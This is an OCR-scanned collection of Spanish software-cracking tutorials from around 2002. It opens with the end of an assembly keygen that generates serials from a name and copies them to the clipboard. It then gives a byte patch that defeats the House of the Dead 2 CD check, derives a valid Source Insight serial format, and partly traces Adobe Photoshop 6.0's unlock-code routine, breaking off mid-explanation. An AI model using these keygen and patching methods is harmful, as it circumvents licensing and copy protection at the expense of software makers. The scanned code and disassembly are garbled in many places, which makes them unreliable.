invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nombre 
invoke Clipo,hDlg 
invoke MessageBox,hDlg,ADDR copiado,ADDR titulo, MB_ICONINFORMATION 
invoke SetFocus,|DC_NAME 


.endif 
ret 
.endif 
.endif 
.endif 
ret 


DigFunc endp 
Operacion proc 


invoke Istrlen,ADDR nombre ;Contamos el tamaño del nombre 


pushad 


mov edi, offset nombre ¡Guardamos el nombre 

mov esi, offset serial ;Se guardará el serial 

mov ebx, eax 

push ebx 

mov dword ptr[esi], 4E4E4E4Eh ;Primeros caracteres NNNN 
add esi,3 ; Agrega tres espacios al serial 

jmp enes ;Va a la rutina enes 

mov ecx, 6Ah ¡Mueve el valor 6Ah a ECX 

xor eax,eax 


pasol: movsx edx, byte ptr [edi+eax] ;Extraemos letra por letra 
inc eax 
lea ecx, dword ptr [ecx+2*edx] 
cmp eax, ebx 
jl paso1 ;Hasta finalizar 


If ecx < 3E8h ;Chequeamos el valor para transformar a decimal 
add esi, 2 

.else 
add esi, 3 

.endif 


mov eax, ecx 

invoke Decimal ;Invocamos la rutina Decimal 
enes: add esi,1 

mov dword ptr[esi],2Dh ;Agrega un guión 

pop ebx 

xor eax,eax 

push ebx 

mov ecx, 6Ah ¡Mueve el valor 6Ah a ECX 


paso2: movsx edx, byte ptr [edi+eax] ;Extraemos letra por letra 
inc eax 
lea edx, dword ptr [edx+4*edx] 
lea ecx, dword ptr [ecx+4* edx] 
cmp eax, ebx 
jng paso2 ;Hasta terminar 


If ecx < 2710h 
add esi, 4 
.else 
add esi,5 
.endif 


mov eax, ecx 
invoke Decimal 

add esi,1 

mov dword ptr[esi],2Dh ;Agregamos otro guión 
pop ebx 

xor eax,eax 

push ebx 


movsx eax, byte ptr [edi+ebx-01] ;Extraemos última letra 
lea edx, dword ptr [eax+4*eax] 

lea eax, dword ptr [eax+2*edx] 

lea ecx, dword ptr [eax+eax+01] 


If ecx < 3E8h 
add esi, 3 
.else 
add esi, 4 
.endif 


mov eax, ecx 
invoke Decimal 

add esi,1 

mov dword ptr[esi],2Dh ;Otro guión 
pop ebx 

mov eax,1Dh 


movsx edx, byte ptr [edi+ebx-01] ;Extraemos la última letra 
lea ecx, dword ptr [4*edx+eax] 


If ecx < 3E8h 
add esi, 3 
.else 
add esi, 4 
.endif 


mov eaX, ecx 
invoke Decimal 


popad 

ret 
Operacion endp 
Decimal proc 


xor ebx, ebx 
mov ecx, 10 
dividir: 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esi+ebx], dl 
dec ebx 
If eax>9 
jmp dividir 
.endif 
add al, 30h 
mov byte ptr [esi+ebx], al 
ret 


Decimal endp 


Clipo proc hDlg: DWORD 
LOCAL gmem : DWORD 


invoke GlobalAlloc, GMEM_ MOVEABLE+GMEM_DDESHARE, 254 
mov gmem,eax 


invoke GlobalLock,eax 
cmp eax,NULL 

je noabra 

mov ebx, offset serial 
lea esi,dword ptr[ebx] 
mov edi,eax 

mov ecx,29 


rep movsb 


invoke OpenClipboard, hDlg 
cmp eax, TRUE 
jne noabra2 


mov eax,gmem 
invoke SetClipboardData,CF_TEXT, eax 


invoke CloseClipboard 


noabra2: 
mov eax,gmem 
invoke GlobalFree,eax 


noabra: 
ret 
Clipo endp 


End Start 


Ahora ya podemos usar el programa de manera más libre, aunque sin embargo quiero que recuerdes, lo de 
siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si ha USTED, le gusta el producto por favor 
COMPRELO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE (gracias por tus consejos y ayuda en la 
realización de este tuto) y a todos los crackers hispanohablantes, en especial a ti por que has llegado hasta 
una vez más hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: The House of the Dead 2 

PROTECCION: CD-Check 

Objetivo: Matar el Cd-CHeck 

Descripcion: Se trata de un juego mu chulo donde matas a un taco de mostruitos, xDDD 

Dificultad: Newbie 

DOWNLOAD : 2299997 

Herramientas: W32Dasm, Soft-lce y Hex WorkShop 

CRACKER: AuspeX FECHA: 01/04/2002 
INTRODUCCION 


Aquí tenemos un jueguesito, sinceramente, el primer juego que crackeo, hasta ahora siempre había crackeado 
programas (juego muy poco, jeje), pero es que este me lo había dejado un colega, y como tenía que pagarle el CD 
entonces pensé que mejor intentaba crackearlo y yo se lo devolvía (no podeis imaginar hasta que punto soy un 
agarrao, ajajaaja). Así que este tuto se lo dedico a mi colega Dani: ¡va por ti DANI! 


The House of the Dead, bonito juego, y estupida protección la verdad sea dicha. Creo que los programadores 
encargados de protegerlo no se han exprimido demasiado la cabeza, así que habrá que enseñarles a esta panda de 
burros por donde se les puede meter mano a sus productos, y que programen mejor el CD-Check 


AL ATAKE 


Lo primero que hacemos es instalar el juego. Luego nos damos el lote de jugar para descargar adrenalina matando zombies, 
y una vez desahogados por completo nos metemos al tajo. Quitamos el CD e intentamos ejecutar de nuevo: 


AN Please insert the The House of The Dead 2' CD. 


¿ Cancelar | 


¿Típico verdad?, pués manos a la obra. Vamos a entrar en el Sice y colocamos un breakpoint en la API MessageBoxA (acerté 
a la primera, jaja), le damos a reintentar a ver que sucede... Revienta el sice justo en la llamada (picó el anzuelo). Salimos de 
la llamada pulsando F12 y nos encontramos con todo este código (código abierto con el W32Dasm, no se puede copiar la 
ventana del sice): 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004A5CB7(C) 
| 


:004A5D22 FFD5 call ebp <-----aquí se llama al mensajito de error (falta el CD) 

:004A5D24 6A00 push 00000000 

:004A5D26 8BFO mov esi, eax 

:004A5D28 FFD3 call ebx 

:004A5D2A 83FE02 cmp esi, 00000002 <-----comprueba a ver si hemos cancelado 

:004A5D2D 7421 je 004A5D50 <----- salta si se ha pulsado cancelar (2 he visto que es cancelar y 4 reintentar) 
:004A5D2F E964FFFFFF ¡mp 004A5C98 <-----se intenta de nuevo 


ERARAAAAKA RARA RARA AA ARA ARKAAAKAAARK AAA KARA ARA RRA AAA KA AAA ARK AAA AA RARA AA KA AAA 


Ahora os pondré todo el código de los alrededores desde donde se salta a esta zona de chico malo, para que se pueda 
comprender como hace el programa para chequear el CD-ROM. Si os marea un poco la cabeza no mireis, por supuesto no lo 
pienzo explicar todo al detalle, sólo lo más importante: 


* Reference To: KERNEL32. CreateFileA, Ord:0034h <-----más abajo veremos para que utiliza esta API 


| 
:004A5C86 8B3D80304C00 mov edi, dword ptr [004C3080] 


* Reference To: USER32.ShowCursor, Ord:0266h <-----no tengo ni idea para que la utiliza 


| 
:004A5C8C 8B1D48324C00 mov ebx, dword ptr [004C3248] 


* Reference To: USER32.MessageBoxA, Ord:O1BEh 


| 

:004A5C92 8B2DFC314C00 mov ebp, dword ptr [004C31FC] <-----coloca la dirección de MessageBoxA en este registro para 
luego, si hace falta jodernos un poquito con su puñetero mensaje de error (recordad el CALL EBP de arriba que sacaba 
nuestro mensaje de error) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004A5D2F(U) 


| 

:004A5C98 8D442410 lea eax, dword ptr [esp+10] 
:004A5C9C 50 push eax 

:004A5C9D 6800010000 push 00000100 


* Reference To: KERNEL32, GetLogicalDriveStringsA, Ord:011Eh 


| 

:004A5CA2 FF1504314C00 Call dword ptr [004C3104] <-----llamada que obtiene una cadena con las unidades válidas que 
existen en el ordenata, en mi caso: a: c:1 d:1 e: (a -> disquetera, c,d -> disco duro, e -> cd-rom) 

:004A5CA8 85CO0 test eax, eax 

:004A5CAA 0F84A0000000 je 004A5D50 


:004A5CBO 8D742410 lea esi, dword ptr [esp+10] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004A5DOB(U) 


| 

:004A5CB4 803E00 cmp byte ptr [esi], 00 <-----comprueba si ha terminado de checkear todas las unidades válidas 
:004A5CB7 7454 je 004A5DO0D <-----saltamos a la zona de chico malo (nos manda al carajo) 

:004A5CB9 56 push esi <-----mandamos como parámetro la dirección de la letra de la unidad que estamos checkeando 


* Reference To: KERNEL32.GetDriveTypeA, Ord:0104h 


| 

:004A5CBA FF15003140C00 Call dword ptr [004C3100] <-----obtenemos un valor en eax que indica la unidad 

:004A5CC0 83F805 cmp eax, 00000005 <-----comprueba si la unidad es cd-rom (0,1 -> ni puta idea, 2 -> disquete, 3 -> 
disco duro, 4 -> unidad de red, 5 -> cd-rom). Esta comprobación es muy interesante 

:004A5CC3 7538 ¡ne 004A5CFD <----- salta si no coincide 

:004A5CC5 8B0D90C87D00 mov ecx, dword ptr [007DC890] 

:004A5CCB 51 push ecx 

:004A5CCC 56 push esi 


* Possible StringData Ref from Data Obj ->"%s%s" 


| 

:004A5CCD 6844765900 push 00597644 

:004A5CD2 6858CF7D00 push 007DCF58 

:004A5CD7 E8BF680000 call 004AC59B 

:004A5CDC 83C410 add esp, 00000010 

:004A5CDF 6A00 push 00000000 

:004A5CE1 6880000000 push 00000080 

:004A5CE6 6A03 push 00000003 <-----creo que es un parámetro que indica que el archivo ha de estar ahí por cojones, pero 
no esoty seguro de esto 

:004A5CE8 6A00 push 00000000 

:004A5CEA 6A00 push 00000000 

:004A5CEC 6800000080 push 80000000 <-----lectura del archivo 

:004A5CF1 6858CF7D00 push 007DCF58 <----- manda la dirección de esta cadena: unidad:1Hod2.ico ???? luego explicaré 
esto, que realmente es la clave de todo este royo 

:004A5CF6 FFD7 call edi <----- llamada a CreateFileA 

:004A5CF8 83F8FF cmp eax, FFFFFFFF <-----si el archivo no está ahí, devuelve -1 en eax = FFFFFFFF 

:004A5CFB 7537 ¡ne 004A5D34 <-----si la cosa ha salido bien, salimos de la rutina y se ejecuta el juego 


SEAS 


Bueno, explicaré un poco lo que se puede hacer, pero una vez entendido todo el código de arriba, la cosa es facil, no?. Si 
más o menos lo habeis comprendido, nos damos cuenta de que checkea las unidades una por una hasta llegar a la unidad de 
CD-ROM. Cuando ve que la letra E (en mi caso) es dicha unidad busca en ella el archivo de icono Hod2.ico en la dirección E:X 

pero como dicho archivito no está por que no hay CD que valga pos nos manda al carajo. Bueno, pués cambiemos ese J NE 
por un ] MP para que salte siempre, esté o no el archivo en la dirección especificada, y sea cual sea la unidad donde esté 
mirando. Otra solución sería que en vez de comprobar con 00000005 compruebe con 00000003 (disco duro) y coloquemos el 
archivo Hod2.ico en la unidad c:1, pero sinceramente, ¿quien quiere hacer esta tontería?. Pués ya está, lo demas no tengo 
ganas de explicarlo, ya sabeis, lo de cambiar los bytes con el Hex WorkShop y to el royo ese, hacedlo ustedes, ¡VAGOSSSSS!. 
Bueno, lo explicaré, ya sabeis, pillamos el offset con el W32Dasm y abrimos Hex WorkShop, buscamos por offset: A5CFBh y 
cambiamos 7537 ¡ne por 7437 je. 


FINALIZANDO 
Hay un monstruo que no consigo matar, uno que hay en la fase 4 con una cierra mecánica, creo que es en esa fase, jeje. 


Bueno, para finalizar doy las gracias al grupo KFOR, a Karpoff y a todos los crackers que escriben tutoriales en sus páginas, 
por enseñarme todo lo que se y de los que aun puedo aprender muchísimo: GRACIAS A TODOS 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2002 


Source Insight v3.1 


Name / Serial, Limitacion de Tiempo 
Extraer el serial 


Un bello programa para escribir otros programas en código fuente 
con resaltado de sintaxis. Sencillamente me encanta. 


Novato 


http://www.sourceinsight.com 


TRW2000 W32dasm file insPEctor 


ByTESCRK FECHA: 05/03/2002 


INTRODUCCION 


Después de hace algún tiempo, casi tres meses de descanso en este aspecto, creo que he salido de 
invernar y aquí vamos nuevamente a la carga, para poner a su disposición un tuto más. 


La verdad es que no tengo ninguna inspiración para escribir una introducción solo sé decirles que 
este programa es muy bueno y lo mejor aún es que la generación del serial es bastante sencilla, 
hubiese preferido que fuera más fácil al principio puesto que en lo que yo se los presento aquí, ya me 
había llevado un día pensando, sin embargo la solución es bastante sencilla. 


Creo que por el momento hemos llegado al final de la intro y por lo tanto procedemos.... 


AL ATAKE 


Primeramente veremos como está formada nuestra pequeña victima. Abrimos el file insPEctor de ViPER y 
procedemos a buscar la carpeta en donde instalamos el programa y procedemos a analizarlo, hacemos clic en 
la pestaña Compilador y vemos que está hecho con Microsoft Visual C++ 6.0 y no está comprimido. 
Cargamos el programa y vemos que aparece una ventanita para registrarnos pero unicamente nos aparece 
un campo para ingresar el serial y cuatro botones (Ok, Exit, Try it, Buy it...), vamos a ingresar un valor 
cualquiera para el serial en mi caso los de siempre 19770424, hacemos clic en el botón de Ok y nos aparece 
una MessageBox con la cadena siguiente "You typed an invalid serial number", ya que tenemos esta 
información que es suficiente para nosotros nos vamos al W32DASM y descompilamos a nuestra victima para 
buscar esta cadena y ver desde donde procede el mensaje. Cuando ya lo tengamos vamos a las References 
Strings y buscamos la cadena, nos encontraremos con esto. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0043CADA(C), :0043CAF9(C), :0043CB38(C), :0043CB56(C), :0043CB67(C) 
|:0043CB86(C), :0043CB9E(C), :0043CBB8(C) 


* Possible StringData Ref from Data Obj ->"You typed an invalid serial number." 


| 
:0043CC30 68D4F74F00 push 004FF7D4 <= Si hacemos dobleclic caemos aqui... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0043CBE0(U) 


Vamos a chequear en 0043CADA y veremos lo siguiente... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:0043CAAD(C) 

| 

:0043CAC7 6A2D push 0000002D 

:0043CAC9 689C627B00 push 007B629C 

:0043CACE E8CD170B00 call 0O4EE2A0 <= Pondremos aquí un breakpoint 
:0043CAD3 8BFO mov esi, eax 

:0043CAD5 83C408 add esp, 00000008 

:0043CAD8 3BF5 cmp esi, ebp 


:0043CADA 0F8450010000 je 0043CC30 <= De aquí procede el salto... 


* Possible StringData Ref from Data Obj ->"SI3US" <= Me parece extraño ):) 


| 
:0043CAEO BF78335300 mov edi, 00533378 


:0043CAE5 83C9FF or ecx, FFFFFFFF 
:0043CAE8 33C0 xor eax, eax 
:0043CAEA 8BD6 mov edx, esi 
:0043CAEC F2 repnz 

:0043CAED AE scasb 

:0043CAEE F7D1 not ecx 

:0043CAFO 49 dec ecx 

:0043CAF1 81EA9C627B00 sub edx, 007B629C 
:0043CAF7 3BD1 cmp edx, ecx 


:0043CAF9 0F8531010000 j¡ne 0043CC30 
* Possible StringData Ref from Data Obj ->"SI3US" 


Agregaremos esta palabra a nuestro serial malo, el cual quedaría así SI 3US19770424. Reiniciamos el 
programa con el TRW y ponemos el breakpoint (bpx 0043CACE), presionamos Ctrl+M o F5 y a hacer el traceo 
al programa, vemos que aunque ingresemos cualquier número siempre el programa nos da el mensajito de 
que no es el correcto si subimos veremos lo siguiente... 


:0043CA40 83ECOC sub esp, 0000000C <= Pondremos el nuevo breakpoint aqui... 
:0043CA43 53 push ebx 

:0043CA44 55 push ebp 

:0043CA45 33ED xor ebp, ebp 

:0043CA47 56 push esi 

:0043CA48 57 push edi 

:0043CA49 894C2418 mov dword ptr [esp+18], ecx 
:0043CA4D C74424149C627B00 mov [esp+14], 007B629C 
:0043CA55 896C2410 mov dword ptr [esp+10], ebp 
:0043CA59 EBO2 jmp 0043CA5D 

:0043CA5B 33ED xor ebp, ebp 

:0043CA5D 8D442414 lea eax, dword ptr [esp+14] 
:0043CA61 BA64010000 mov edx, 00000164 
:0043CA66 50 push eax 

:0043CA67 B9D0E34F00 mov ecx, 004FE3DO 
:0043CA6C C6059C627B0000 mov byte ptr [007B629C], 00 
:0043CA73 E87856FCFF call 004020FO <= Esta es la función que solicita el serial 
:0043CA78 83F802 cmp eax, 00000002 
:0043CA7B 0F84C9010000 je 0043CC4A 

:0043CA81 83F801 cmp eax, 00000001 
:0043CA84 0F8558010000 jne 0043CBE2 

:0043CA8A A09C627B00 mov al, byte ptr [007B629C] 
:0043CA8F 84C0 test al, al 

:0043CA91 0F84B3010000 je 0043CC4A 

:0043CA97 B99C627B00 mov ecx, 007B629C 


:0043CA9C E83F55FFFF call 00431FEO 


:0043CAA1 A09C627B00 
:0043CAA6 BE9C627B00 
:0043CAAB 84C0 
:0043CAAD 7418 
:0043CAAF 25FF000000 
:0043CAB4 50 
:0043CAB5 E8701A0B00 
:0043CABA 83C404 
:0043CABD 8806 
:0043CABF 8A4601 
:0043CAC2 46 
:0043CAC3 84C0 
:0043CAC5 75E8 
:0043CAC7 6A2D 
:0043CAC9 689C627B00 
:0043CACE E8CD170B00 
:0043CAD3 8BF0 
:0043CAD5 83C408 
:0043CAD8 3BF5 
:0043CADA 0F8450010000 


mov al, byte ptr [007B629C] 
mov esi, 007B629C 

test al, al 

je 0043CAC7 


and eax, 000000FF <= Aqui 
push eax se 
call 004EE52A empieza 
add esp, 00000004 a 
mov byte ptr [esil, al comparar 
mov al, byte ptr [esi+01] todo 
inc esi el 
test al, al serial 
¡ne 0043CAAF <========= 


push 0000002D 
push 007B629C 
call 004EE2A0 
mov esi, eax 
add esp, 00000008 
cmp esi, ebp 
je 0043CC30 


Hemos vuelto a la dirección 0043CADA sin embargo, ya avanzamos cierto tramo en este camino, sin embargo 
siento como si estamos dando vueltas en la misma dirección. 


Ahora probemos con separar el serial de la palabra SI3US así SI3US-19770424 probamos y.... hemos pasado 
al siguiente pasado, no nos ha dado mensaje de error... y vemos lo siguiente aunque no es nada interesante 
sino nada más que algunas operaciones... 


:0043CAEO BF78335300 
:0043CAE5 83C9FF 
:0043CAE8 33C0 


mov edi, 00533378 
or ecx, FFFFFFFF 
xor eax, €ax 


En esta parte el programa empieza a comparar los caracteres de la palabra SI3US 


:0043CB15 33C9 
:0043CB17 8A8D78335300 
:0043CB1D 51 

:0043CB1E E8071A0B00 
:0043CB23 33D2 
:0043CB25 8BD8 
:0043CB27 8A959C627B00 
:0043CB2D 52 

:0043CB2E E8F7190B00 
:0043CB33 83C408 
:0043CB36 3BC3 
:0043CB38 0F85F2000000 
:0043CB3E 45 

:0043CB3F 8BC7 
:0043CB41 4F 

:0043CB42 85C0 
:0043CB44 75CF 


xor ecx, ecx 
mov cl, byte ptr [ebp+00533378] 
push ecx 
call 004EE52A 
xor edx, edx 
mov ebx, eax 
mov dl, byte ptr [ebp+007B629C] 
push edx 
call 004EE52A 
add esp, 00000008 
cmp eax, ebx 
j¡ne 0043CC30 
inc ebp 
mov eax, edi 
dec edi 
test eax, eax 
j¡ne 0043CB15 


Luego de comparar el programa regresa y chequea una segunda separación por lo que se puede deducir 
que si no está sale y da error por lo que podemos deducir que el tipo de serial es 


SI3US-19770424-SI3US 


:0043CB46 46 
:0043CB47 6A2D 
:0043CB49 56 
:0043CB4A E851170B00 
:0043CB4F 8BE8 
:0043CB51 83C408 
:0043CB54 85ED 


inc esi 

push 0000002D 
push esi 

call 0O04EE2A0 <= Aqui se extrae el guión 
mov ebp, eax 

add esp, 00000008 
test ebp, ebp 


:0043CB56 0F84D4000000 je 0043CC30 <= Si no está da error... 


:0043CB5C 8BCD mov ecx, ebp 

:0043CB5E C6450000 mov [ebp+00], 00 

:0043CB62 2BCE sub ecx, esi <= Extrae ES|-ECX 

:0043CB64 83F906 cmp ecx, 00000006 <= Si el serial no es igual a 6 es falso 


:0043CB67 0F85C3000000 j¡ne 0043CC30 <= Aqui va al mensaje de error 
Por lo que procederemos a hacer una nueva modificación a nuestro serial... ahora quedará así... 
S13US-197704-SI3US 


Haciendo todo nuevamente podemos ver que el programa luego de comparar continua pues no se cumple la 
condición de que si no es igual de error 


:0043CB6D 8A06 mov al, byte ptr [esi] <= Extrae el primer valor de 197704 
:0043CB6F 8BCE mov ecx, esi <= Mueve el valor de ESI = 197704 a ECX 
:0043CB71 8ADO mov dl, al 

:0043CB73 3AC2 cmp al, dl 

:0043CB75 750C ¡ne 0043CB83 


Vemos que no ocurre nada interesante hasta... aquí... 


:0043CB8C 8D5DO1 lea ebx, dword ptr [ebp+01] <= Extrae el último valor 
:0043CB8F 83C9FF or ecx, FFFFFFFF 

:0043CB92 8BFB mov edi, ebx 

:0043CB94 33C0 xor eax, eax 

:0043CB96 F2 repnz 

:0043CB97 AE scasb 

:0043CB98 F7D1 not ecx 

:0043CB9A 49 dec ecx 

:0043CB9B 83F905 cmp ecx, 00000005 <= Compara que tenga tamaño de cinco 
:0043CB9E 0F858C000000 ¡ne 0043CC30 <= Si así es continua 

:0043CBA4 8BCE mov ecx, esi <= Mueve 197704 a ECX 

:0043CBA6 E825D80800 call 004CA3DO0 <= Calcula un valor para comparar con la tercera parte 
:0043CBAB 8BFO mov esi, eax <= Mueve el valor de EAX a ESI 

:0043CBAD 53 push ebx 

:0043CBAE E8CF160B00 call 004EE282 <= Transforma el valor de Decimal a Hex 
:0043CBB3 83C404 add esp, 00000004 

:0043CBB6 3BFO cmp esi, eax <= Compara los dos valores 

:0043CBB8 7576 j¡ne 0043CC30 <= Si no son iguales da error 

:0043CBBA 8B0D7CF55300 mov ecx, dword ptr [0053F57C] 

:0043CBC0 689C627B00 push 007B629C 


Al escribir el comando ? EAX vemos que nuestro valor está guardado en el y el valor original está en ESI, por 
lo tanto podemos resumir que el serial del programa es igual a 


SI3US-NNNNNN-NNNNN 
EL FIN 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, aunque como RAZIEL nos dice que podemos hacer 
y deshacer con el programa, realmente yo tambien los invito a hacerlo ;o)" 


Y así doy por concluído un tuto más, saludando a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE, 
[Kalisto (okaruzic) "Salute"] y a todos los crackers hispanohablantes. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor1999-2002 


Programa: Adobe PhotoShop v6.0 


PROTECCION: Instalación: Unlock Code 


Descripcion: 


Programa de retoque fotográfico 


Dificultad: un poco lioso tal vez, pero nada complicado 
DOWNLOAD : Ni idea 


Herramientas: 


Softice y mi cabecita 


CRACKER: AuspeX FECHA: 018/03/2002 


INTRODUCCION 


Aquí tenemos un programa que, al principio, me trajo un poco de cabeza por que no trabajaba 
como otros programas que había crackeado y que eran del mismo estilo. Este se dedica a 
marearnos haciendo una serie de tonterías con el código introducido y que al final todo se reduce a 
un simple cambio de flag en memoria (1 -> código correcto, O -> código erróneo). Bueno, pues me 
llevó unas cuantas horas, estudiando el código, darme cuenta de esto (hay que entender que yo 
aun soy bastante novatillo en este mundo). 


El problema te lo encuentras únicamente en la instalación. Te sale la típica ventanita para 
registrarte, introduciendo nombre y demás, y luego el código unlock. 


| AL ATAKE 


Pues vamos allá... Arrancamos el programa de instalación y comenzamos a darle a siguiente, siguiente, etc... 
hasta que nos mánda a la ventanita de registro, así observamos algo como esto: 


Información del usuario | 


Debe completar la siguiente información para poder finalizar la 
instalación del producto de Adobe. 


El producto está registro para 


¡tl 


Tratamiento |] 

Nombre | | | 
Apelidos y qOo 
Empresa A 
Número de serie A] 


< Anterior Cancelar 


Pués nada, le metemos cualquier chorrada (no intenteis acertarlo a la primera, jeje), y le damos a siguiente, 
¿y que es lo que sucede?, púes supongo que lo que tenía que suceder: 


IN 1234567890 no es un número de serie válido Adobe Photoshop 6.0. 


“uelva a escribirlo. 


Aceptar 


Lo primero que se nos puede ocurrir aquí, quizas sea estudiar el código de los alrededores de este mensajito 
(pues sice saltaba con MessageBoxaA), pero he de decir que la cosa no era fácil, pués se llamaba a esta 
zona de código desde un CALL [EBP-24], instrucción que se ejecutaba muchísimas veces (y cuando digo 

muchísimas digo por lo menos 50 o más veces) antes y después del mensajito y por lo tanto me pareció un 
camino un tanto complicado, habiendo otros más sencillos (no se si me he explicado bien). Bueno, veamos 
entonces por donde meterle mano a esto. |Intentemoslo atacando a alguna API que recoja nuestro código. 

Después de probar alguna que otra llamada, me funcionó GetWindowTextA, tambien la famosa 

HMEMCPY, pero pensé que mejor comenzaría probando la primera ya que esta otra tiene más traceo (ese 

día estaba muy flojo como habreis podido comprobar, jeje). He de decir que me saltó 6 veces, una por cada 
cuadro de texto, y por lo tanto el que nos interesa es el último, que es el que captura nuestro número de 
serie introducido. Veamos ahora este pequeño trozo de código, que no es demasiado importante, pero que 

quiero poner para luego explicar una cosa: 


* Reference To: USER32.GetWindowTextA, Ord: 013Fh 


| 

:0042F74E FF15CC034800 Call dword ptr [004803CC] <-----Recoje el serial 

:0042F754 8D8500FCFFFF lea eax, dword ptr [ebp+FFFFFCOO] <-----eax = dirección donde recoge el serial 

:0042F75A 50 push eax 

:0042F75B 8B4508 mov eax, dword ptr [ebp+08] 

:0042F75E FF7008 push [eax+-08] 

:0042F761 E85B210300 call 004618C1 <-----Da como salida nuestro serial copiado en la dirección que hay en eax (y es 
515E10h), en edx la longitud y en ecx la dirección donde se encuentra, por decirlo de alguna manera, la otra copia original 
del serial introducido 


A partir de aquí, me tiré bastante tiempo estudiando el código que seguía para ver si realizaba alguna 
operación con el serial, no se, algo, pero no hacía nada de nada con él, parece ser que lo dejaba ahí 
olvidado y se encargaba de hacer otras cosas que no tenían nada que ver, por lo menos a mi entender. Así 
que decidí cambiar de extrategia: una vez copiado el número de serie en la dirección 515E10h (tras el último 
CALL) poner un BPM en dicho lugar para ver donde coño le metía mano, y así me dejaba de tantas historias 
y tanto traceo inútil. Volvemos pués a darle a siguiente y repetimos F5 hasta que nos coja el serial. 
Traceamos luego el código mostrado arriba hasta después del último CALL y hacemos: bd O (deshabilitamos 
el bpx de GetWindowTextA) y luego bpm eeax r (recordad que en eax está la dirección de la copia, y "r" por 
que queremos saber cuando lee de esta dirección). Veamos ahora las llamadas más importantes a la que me 

llevó dicho break, donde se le metía mano al serial: 


Exported fn(): CheckExpiringSerialNumber - Ord:0007h <-----Fijaos lo que dice aquí, parece ser que comprueba que el número 
de serie introducido no haya expirado, o sea, caducado 

:10002BDO 83ECOC sub esp, 00O00000C 

:10002BD3 53 push ebx 

:10002BD4 55 push ebp 

:10002BD5 56 push esi 

:10002BD6 8B74241C mov esi, dword ptr [esp+1C] 

:10002BDA 6A03 push 00000003 <-----Longitud 3 

:10002BDC 56 push esi <-----Dirección del serial 


* Possible StringData Ref from Data Obj ->"EXX" 


| 

:10002BDD 68E0820010 push 100082E0 <-----Dirección de la cadena "EXX" 

:10002BE2 33ED xor ebp, ebp 

:10002BE4 E8F73E0000 call 10006AEO <-----Aquí es donde se le mete mano por primera vez al serial, y lo que hace es 
comprobar si los tres primeros caracteres de nuestro serial son EXX 

:10002BE9 83C40C add esp, 0O00000C 

:10002BEC 85CO0 test eax, eax <-----Si eax <> 0 (si no cumple lo de arriba...) 

:10002BEE OF851C010000 jne 10002D10 <-----Salta fuera, y devolverá un 1 (el serial no ha expirado) 


Lo que sigue después son una serie de comprobaciones más que hace para decidir si el número ha caducado 
O no, pero que realmente no nos interesa demasiado, pues lo que nosotros queremos es buscar un serial 
que valga y no uno que ya no sirva, ¿verdad?. Pués nada, nos salimos de la función con F12, y ahí podemos 
comprobar como mete un 1 en la dirección [EBP+FFFFFB70], significa que por ahora el número es bueno 
(no ha expirado). 


Lo que sigue es un poco más complicado, por que se trata de comprobar ahora si nuestro serial es el 
correcto, realizando, para ello, una serie de operaciones con él que quizas mareen un poco. Volvemos a 
pulsar F5 para que se detenga cuando quiera meterle mano, de nuevo, al numerito. Tras un par de paradas, 
poco importantes, caemos en el siguiente trozo de código: 


* Referenced by a CALL at Address: 
|:10001€46 


¡Por aquí hace algunas operaciones absurdas como por ejemplo pasar nuestro serial a mayusculas, algo que no ;tiene mucho 
sentido si al introducir datos en el cuadro de texto del número de serie automáticamente este lo ¡transforma a mayusculas... 


[:10001947 52 push edx <-----Dirección donde se encuentra el serial 
:10001948 50 push eax <-----Dirección a donde lo va a copiar 


* Reference To: KERNEL32.IstrcpyA, Ord: 0302h 


| 

:10001949 FF1520700010 Call dword ptr [10007020] <----- Copia serial 

:1000194F 8D8C249C010000 lea ecx, dword ptr [esp+0000019C] 

:10001956 51 push ecx <-----Nueva Dirección del serial 

:10001957 E8E4030000 call 10001D40 <-----Comprueba si nuestro serial coincide con una serie de claves que hay en una zona 
de memoria, ¿aquí está lo que buscabamos?, ahora os explicaré que no es así 

:1000195C 83C404 add esp, 00000004 

:1000195F 85C0 test eax, eax <-----¿Coincide? 

:10001961 7418 je 10001978 <-----Si no es así salta 

:10001963 68D0070000 push 000007DO 


* Reference To: KERNEL32.Sleep, Ord:0296h 


| 

:10001968 FF1528700010 Call dword ptr [10007028] <-----¿Y esta tonteria pa que coño la hace?, Se queda, durante dos 
segundos, el programa parado, ¿ni idea, macho? 

:1000196E 5F pop edi 

:1000196F 5E pop esi 

:10001970 5D pop ebp 

:10001971 33C0 xor eax, eax 

:10001973 5B pop ebx 

:10001974 81C48C020000 add esp, 0000028C 

:1000197A C3 ret 


Bién, os explico un poco: ¿Veis ese CALL donde comprueba nuestro serial con otros que ya hay en 
memoria?, parece que la cosa ya esta clara ¿no?, pués resultó que no, jeje. Dentro lo que hace primero es 
transformal la clave pasando todos los caracteres por XOR eax,AA (eax contiene el caracter), y luego, como 
